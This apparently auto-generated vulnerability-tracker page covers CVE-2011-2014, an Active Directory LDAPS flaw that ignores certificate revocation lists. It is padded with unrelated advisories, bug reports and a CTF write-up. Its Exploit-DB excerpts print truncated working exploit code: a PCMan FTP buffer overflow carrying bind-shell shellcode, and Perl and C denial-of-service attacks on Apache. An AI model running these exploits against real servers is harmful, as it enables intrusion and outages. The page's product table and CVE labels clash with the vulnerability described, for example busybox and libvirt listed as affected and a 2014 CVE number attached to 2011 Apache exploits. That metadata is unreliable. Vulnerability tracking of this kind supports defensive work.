CVE-2011-2014
published 2011-11-08CVE-2011-2014: The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service…
PriorityP347critical9CVSS 2.0
AVNACLAuSCCICAC
EPSS
10.96%
95.3th percentile
The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka "LDAPS Authentication Bypass Vulnerability."
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| busybox | busybox | >= 0 < 1:1.21.0-1ubuntu1.4 | 1:1.21.0-1ubuntu1.4 |
| busybox | busybox | >= 0 < 1:1.22.0-15ubuntu1.4 | 1:1.22.0-15ubuntu1.4 |
| busybox | busybox | >= 0 < 1:1.27.2-2ubuntu3.2 | 1:1.27.2-2ubuntu3.2 |
| microsoft | windows_server_2008 | — | — |
| redhat | libvirt | >= 0 < 1.2.2-0ubuntu13.1.16 | 1.2.2-0ubuntu13.1.16 |
CVSS provenance
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
osv7.5HIGH
vendor_redhat6.8MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qm9j-69fp-v8p4: The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory
ghsa_unreviewed·2022-05-13
CVE-2011-2014 [HIGH] CWE-287 GHSA-qm9j-69fp-v8p4: The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory
The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka "LDAPS Authentication Bypass Vulnerability."
OSV
busybox vulnerabilities
osv·2019-04-03·CVSS 7.5
CVE-2011-5325 busybox vulnerabilities
busybox vulnerabilities
Tyler Hicks discovered that BusyBox incorrectly handled symlinks inside tar
archives. If a user or automated system were tricked into processing a
specially crafted tar archive, a remote attacker could overwrite arbitrary
files outside of the current directory. This issue only affected Ubuntu
14.04 LTS and Ubuntu 16.04 LTS. (CVE-2011-5325)
Mathias Krause discovered that BusyBox incorrectly handled kernel module
loading restrictions. A local attacker could possibly use this issue to
bypass intended restrictions. This issue only affected Ubuntu 14.04 LTS.
(CVE-2014-9645)
It was discovered that BusyBox incorrectly handled certain ZIP archives. If
a user or automated system were tricked into processing a specially crafted
ZIP archive, a remote attacker could cause Bu
OSV
libvirt vulnerabilities
osv·2016-01-12·CVSS 5.9
CVE-2011-4600 libvirt vulnerabilities
libvirt vulnerabilities
It was discovered that libvirt incorrectly handled the firewall rules on
bridge networks when the daemon was restarted. This could result in an
unintended firewall configuration. This issue only applied to Ubuntu 12.04
LTS. (CVE-2011-4600)
Peter Krempa discovered that libvirt incorrectly handled locking when
certain ACL checks failed. A local attacker could use this issue to cause
libvirt to stop responding, resulting in a denial of service. This issue
only applied to Ubuntu 14.04 LTS. (CVE-2014-8136)
Luyao Huang discovered that libvirt incorrectly handled VNC passwords in
shapshot and image files. A remote authenticated user could use this issue
to possibly obtain VNC passwords. This issue only affected Ubuntu 14.04
LTS. (CVE-2015-0236)
Han Han discovered that
Red Hat
nginx: SMTP STARTTLS plaintext injection flaw
vendor_redhat·2014-08-05·CVSS 6.8
CVE-2014-3556 [MEDIUM] nginx: SMTP STARTTLS plaintext injection flaw
nginx: SMTP STARTTLS plaintext injection flaw
The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
Statement: This issue did not affect the versions of nginx as shipped with Red Hat Software Collections 1 for Red Hat Enterprise Linux 6 and 7.
Package: nginx14-nginx (Red Hat Software Collections) - Not affected
Package: nginx16-nginx (Red Hat Software Collections) - Affected
No detection rules found.
Exploit-DB
Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow (PoC)
exploitdb·2014-06-18
CVE-2014-4334 Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow (PoC)
Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow (PoC)
---
#!/usr/bin/perl
#
#
# Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability
#
#
# Vendor: Ubisoft Entertainment S.A.
# Product web page: http://www.ubi.com
# Affected version: 1.2.103716, 1.1.100477 and 1.0.95278
#
# Summary: Rayman Legends is a 2013 platform game developed by Ubisoft
# Montpellier and published by Ubisoft. It is the fifth main title in
# the Rayman series and the direct sequel to the 2011 game Rayman Origins.
# The game was released for Microsoft Windows, Xbox 360, PlayStation 3,
# Wii U, and PlayStation Vita platforms in August and September 2013.
# PlayStation 4 and Xbox One versions were released in February 2014.
#
# Desc: The vulnerability is caused due to a memset()
Exploit-DB
PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
exploitdb·2014-01-29
CVE-2013-4730 PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
---
# Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow
# Date: Jan 25,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 2.07
# Tested on: Windows 7 sp1 x64 (english)
# Email: [email protected]
import socket as s
from sys import argv
#
if(len(argv) != 4):
print "USAGE: %s host " % argv[0]
exit(1)
else:
#store command line arguments
script,host,fuser,fpass=argv
#vars
junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars
espaddress = '\x59\x06\xbb\x76' # 76BB0659
nops = '\x90' * 10
shellcode = ( # BIND SHELL | PORT 4444
"\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
"\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x
Exploit-DB
Apache - Denial of Service
exploitdb·2011-12-09·CVSS 7.8
CVE-2014-5329 [HIGH] Apache - Denial of Service
Apache - Denial of Service
---
/*
* This is a reverse engineered version of the exploit for CVE-2011-3192 made
* by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz).
* Copyright 2011 Ramon de C Valle
*
* Compile with the following command:
* gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
void ptrace_trap(void) __attribute__ ((constructor));
void
ptrace_trap(void) {
if (ptrace(PTRACE_TRACEME, 0, 0, 0) argv_string);
j = 0;
while (j != 10) {
struct addrinfo hints;
struct addrinfo *result, *rp;
int sfd, s;
ssize_t nwritten;
memset(&hints, 0, sizeof(struct addrinfo));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_flags = 0;
hints.ai_protocol = 0;
s = getadd
Exploit-DB
Apache - Remote Memory Exhaustion (Denial of Service)
exploitdb·2011-08-19
CVE-2014-5329 Apache - Remote Memory Exhaustion (Denial of Service)
Apache - Remote Memory Exhaustion (Denial of Service)
---
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
use IO::Socket;
use Parallel::ForkManager;
sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
$pm = new Parallel::ForkManager($numforks);
$|=1;
srand(time());
$p = "";
for ($k=0;$kstart and next;
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
P
Bugzilla
gcc: resource consumption issue in libstdc++ C++ regex library
bugzilla·2014-08-05
[LOW] gcc: resource consumption issue in libstdc++ C++ regex library
gcc: resource consumption issue in libstdc++ C++ regex library
Maksymilian Arciemowicz reported a resource consumption issue in the libstdc++ C++ regex library. If an attacker were able to make an application using this library process a specially-crafted regular expression, it could cause the application to consume excessive system resources.
Original report:
http://seclists.org/fulldisclosure/2014/Aug/1
Upstream bug:
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61601
Currently on Fedora, this requires compiling the affected program with the experimental ISO C++ 2011 support by using the "-std=c++11" option.
Discussion:
Created gcc tracking bugs for this issue:
Affects: fedora-all [bug 1126692]
---
CVE request: http://www.openwall.com/lists/oss-security/2014/08/05/4
---
The u
Bugzilla
gcc: memory corruption issues in libstdc++ C++ regex library
bugzilla·2014-08-05
[MEDIUM] gcc: memory corruption issues in libstdc++ C++ regex library
gcc: memory corruption issues in libstdc++ C++ regex library
Maksymilian Arciemowicz reported memory corruption issues in the libstdc++ C++ regex library. If an attacker were able to make an application using this library process a specially-crafted regular expression, it could cause the application to crash or, potentially, execute arbitrary code.
Original report:
http://seclists.org/fulldisclosure/2014/Aug/1
Upstream bug:
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61582
Currently on Fedora, this requires compiling the affected program with the experimental ISO C++ 2011 support by using the "-std=c++11" option.
Discussion:
Created gcc tracking bugs for this issue:
Affects: fedora-all [bug 1126692]
---
CVE request: http://www.openwall.com/lists/oss-security/2014/08/05/4
---
Bugzilla
CVE-2014-4978 rawstudio: Insecure use of temporary file
bugzilla·2014-07-16·CVSS 5.5
CVE-2014-4978 [MEDIUM] CVE-2014-4978 rawstudio: Insecure use of temporary file
CVE-2014-4978 rawstudio: Insecure use of temporary file
The following was reported:
...
The function "rs_filter_graph" located in file ./librawstudio/rs-filter.c contains the following code:
g_string_append_printf(str, "}\n");
g_file_set_contents("/tmp/rs-filter-graph", str->str, str->len, NULL);
ignore = system("dot -Tpng >/tmp/rs-filter-graph.png CVE request: http://seclists.org/oss-sec/2014/q3/160
MITRE assigned CVE-2014-4978 to this issue.
---
Upstream seems dead, last commit is on February, maybe it's time to retire the package.
---
This is upstream - not dead :)
Please note that this function can not be called by end users without modifying Rawstudio source. We disabled it in march 2011.
Fix is here for future references:
https://github.com/rawstudio/rawstudio/commit/9c2cd3
Bugzilla
CVE-2014-0104 fence-agents: no verification of remote SSL certificates
bugzilla·2014-02-28·CVSS 5.9
CVE-2014-0104 [MEDIUM] CVE-2014-0104 fence-agents: no verification of remote SSL certificates
CVE-2014-0104 fence-agents: no verification of remote SSL certificates
Michael Samuel reported that fence-agents does not verify remote SSL certificates in the fence_cisco_ucs.py script. This could potentially allow for man-in-the-middle attackers to spoof SSL servers via arbitrary, yet valid, SSL certificates.
This script did verify the validity of SSL certificates by default, but this behaviour was changed due to bug #691392, which introduced this behaviour via RHBA-2011:0834 [1].
* The fence_cisco_ucs script no longer checks the validity of SSL certificates by default. (BZ#691392)
Also note that this behaviour appears in the fence_rhevm.py script as well.
[1] http://rhn.redhat.com/errata/RHBA-2011-0834.html
Discussion:
Michael suggested the following as a potential idea of how t
CTF
hashes / README
ctf_writeups·2014·CVSS 4.3
CVE-2011-4969 [MEDIUM] hashes / README
# CSAW CTF 2014: hashes
**Category:** Web
**Points:** 300
**Description:**
> location, location, location
>
> Chal is very very stable. If you were scanning the site while I was doing dev work your requests are probably being dropped.
>
>
>
> Written by ColdHeat
## Write-up
The linked page uses an old version of the jQuery library (v1.6.1), [which enables an XSS vulnerability when e.g. `$('#' + userContent)` is called](http://bugs.jquery.com/ticket/9521) ([CVE-2011-4969](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4969)). The page also contains this script:
```js
$(window).bind( 'hashchange', function(e) {
$('.image').hide()
tag = window.location.hash
$(tag).show()
});
tag = window.location.hash
$(tag).show()
```
This makes it possible to inject arbitrary JavaScript sim
http://www.securitytracker.com/id?1026294https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-086https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13278http://www.securitytracker.com/id?1026294https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-086https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13278
2011-11-08
Published